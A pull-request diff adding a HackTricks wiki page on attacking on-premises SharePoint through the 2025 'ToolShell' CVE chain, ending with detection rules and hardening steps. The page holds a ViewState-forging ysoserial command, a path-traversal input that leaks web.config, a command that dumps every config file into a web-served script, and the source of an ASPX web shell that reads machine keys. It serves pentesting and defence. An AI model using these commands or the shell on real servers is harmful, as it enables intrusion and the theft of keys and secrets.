Merge pull request #1167 from HackTricks-wiki/update_Active_Exploitation_of_Microsoft_SharePoint_Vulner_20250722_012819

Active Exploitation of Microsoft SharePoint Vulnerabilities ...

Author: carlospolop

src/SUMMARY.md

@@ -423,6 +423,7 @@
   - [Joomla](network-services-pentesting/pentesting-web/joomla.md)
   - [JSP](network-services-pentesting/pentesting-web/jsp.md)
   - [Laravel](network-services-pentesting/pentesting-web/laravel.md)
+  - [Microsoft Sharepoint](network-services-pentesting/pentesting-web/microsoft-sharepoint.md)
   - [Moodle](network-services-pentesting/pentesting-web/moodle.md)
   - [NextJS](network-services-pentesting/pentesting-web/nextjs.md)
   - [Nginx](network-services-pentesting/pentesting-web/nginx.md)

src/network-services-pentesting/pentesting-web/README.md

@@ -82,6 +82,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
 - [**GraphQL**](graphql.md)
 - [**H2 - Java SQL database**](h2-java-sql-database.md)
 - [**IIS tricks**](iis-internet-information-services.md)
+- [**Microsoft SharePoint**](microsoft-sharepoint.md)
 - [**JBOSS**](jboss.md)
 - [**Jenkins**](<[https:/github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/pentesting-web/broken-reference/README.md](https:/github.com/HackTricks-wiki/hacktricks-cloud/tree/master/pentesting-ci-cd/jenkins-security)/>)
 - [**Jira**](jira.md)

src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md

@@ -0,0 +1,139 @@
+# Microsoft SharePoint – Pentesting & Exploitation
+
+{{#include ../../banners/hacktricks-training.md}}
+
+> Microsoft SharePoint (on-premises) is built on top of ASP.NET/IIS.  Most of the classic web attack surface (ViewState, Web.Config, web shells, etc.) is therefore present, but SharePoint also ships with hundreds of proprietary ASPX pages and web services that dramatically enlarge the exposed attack surface.  This page collects practical tricks to enumerate, exploit and persist inside SharePoint environments with emphasis on the 2025 exploit chain disclosed by Unit42 (CVE-2025-49704/49706/53770/53771).
+
+## 1. Quick enumeration
+
+```
+# favicon hash and keywords
+curl -s https://<host>/_layouts/15/images/SharePointHome.png
+curl -s https://<host>/_vti_bin/client.svc | file -  # returns WCF/XSI
+
+# version leakage (often in JS)
+curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"
+
+# interesting standard paths
+/_layouts/15/ToolPane.aspx               # vulnerable page used in 2025 exploit chain
+/_vti_bin/Lists.asmx                     # legacy SOAP service
+/_catalogs/masterpage/Forms/AllItems.aspx
+
+# enumerate sites & site-collections (requires at least Anonymous)
+python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>
+```
+
+## 2. 2025 exploit chain (a.k.a. “ToolShell”)
+
+### 2.1 CVE-2025-49704 – Code Injection on ToolPane.aspx
+
+`/_layouts/15/ToolPane.aspx?PageView=…&DefaultWebPartId=<payload>` allows arbitrary *Server-Side Include* code to be injected in the page which is later compiled by ASP.NET.  An attacker can embed C# that executes `Process.Start()` and drop a malicious ViewState.
+
+### 2.2 CVE-2025-49706 – Improper Authentication Bypass
+
+The same page trusts the **X-Forms_BaseUrl** header to determine the site context.  By pointing it to `/_layouts/15/`,  MFA/SSO enforced at the root site can be bypassed **unauthenticated**.
+
+### 2.3 CVE-2025-53770 – Unauthenticated ViewState Deserialization → RCE
+
+Once the attacker controls a gadget in `ToolPane.aspx` they can post an **unsigned** (or MAC-only) `__VIEWSTATE` value that triggers .NET deserialization inside *w3wp.exe* leading to code execution.
+
+If signing is enabled, steal the **ValidationKey/DecryptionKey** from any `web.config` (see 2.4) and forge the payload with *ysoserial.net* or *ysodom*:
+
+```
+ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" |
+    ViewStateGenerator.exe --validation-key <hex> --decryption-key <hex> -o payload.txt
+```
+
+For an in-depth explanation on abusing ASP.NET ViewState read:
+{{#ref}}
+../../pentesting-web/deserialization/exploiting-__viewstate-parameter.md
+{{#endref}}
+
+### 2.4 CVE-2025-53771 – Path Traversal / web.config Disclosure
+
+Sending a crafted `Source` parameter to `ToolPane.aspx` (e.g. `../../../../web.config`) returns the targeted file, allowing leakage of:
+
+* `<machineKey validationKey="…" decryptionKey="…">`  ➜ forge ViewState / ASPXAUTH cookies
+* connection strings & secrets.
+
+## 3. Post-exploitation recipes observed in the wild
+
+### 3.1 Exfiltrate every *.config* file (variation-1)
+
+```
+cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"
+```
+
+The resulting `debug_dev.js` can be downloaded anonymously and contains **all** sensitive configuration.
+
+### 3.2 Deploy a Base64-encoded ASPX web shell (variation-2)
+
+```
+powershell.exe -EncodedCommand <base64>
+```
+
+Decoded payload example (shortened):
+
+```csharp
+<%@ Page Language="C#" %>
+<%@ Import Namespace="System.Security.Cryptography" %>
+<script runat="server">
+    protected void Page_Load(object sender, EventArgs e){
+        Response.Write(MachineKey.ValidationKey);
+        // echo secrets or invoke cmd
+    }
+</script>
+```
+Written to:
+
+```
+C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
+```
+
+The shell exposes endpoints to **read / rotate machine keys** which allows forging ViewState and ASPXAUTH cookies across the farm.
+
+### 3.3 Obfuscated variant (variation-3)
+
+Same shell but:
+* dropped under `...\15\TEMPLATE\LAYOUTS\`
+* variable names reduced to single letters
+* `Thread.Sleep(<ms>)` added for sandbox-evasion & timing-based AV bypass.
+
+## 4. Detection ideas
+
+| Telemetry | Why it is suspicious |
+|-----------|----------------------|
+| `w3wp.exe → cmd.exe`             | Worker process should rarely spawn shell  |
+| `cmd.exe → powershell.exe -EncodedCommand` | Classic lolbin pattern           |
+| File events creating `debug_dev.js` or `spinstall0.aspx` | IOCs straight from ToolShell |
+| `ProcessCmdLine CONTAINS ToolPane.aspx` (ETW/Module logs) | Public PoCs invoke this page |
+
+Example XDR / Sysmon rule (pseudo-XQL):
+
+```
+proc where parent_process_name="w3wp.exe" and process_name in ("cmd.exe","powershell.exe")
+```
+
+## 5. Hardening & Mitigation
+
+1. **Patch** – July 2025 security updates fix *all* four CVEs.
+2. **Rotate** every `<machineKey>` and `ViewState` secrets after compromise.
+3. Remove *LAYOUTS* write permission from `WSS_WPG` & `WSS_ADMIN_WPG` groups.
+4. Block external access to `/_layouts/15/ToolPane.aspx` at proxy/WAF level.
+5. Enable **ViewStateUserKey**, **MAC enabled**, and custom *EventValidation*.
+
+## Related tricks
+
+* IIS post-exploitation & web.config abuse:  
+{{#ref}}
+../../network-services-pentesting/pentesting-web/iis-internet-information-services.md
+{{#endref}}
+
+## References
+
+- [Unit42 – Active Exploitation of Microsoft SharePoint Vulnerabilities](https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/)
+- [GitHub PoC – ToolShell exploit chain](https://github.com/real-or-not/ToolShell)
+- [Microsoft Security Advisory – CVE-2025-49704 / 49706](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-49704)
+- [Microsoft Security Advisory – CVE-2025-53770 / 53771](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-53770)
+
+{{#include ../../banners/hacktricks-training.md}}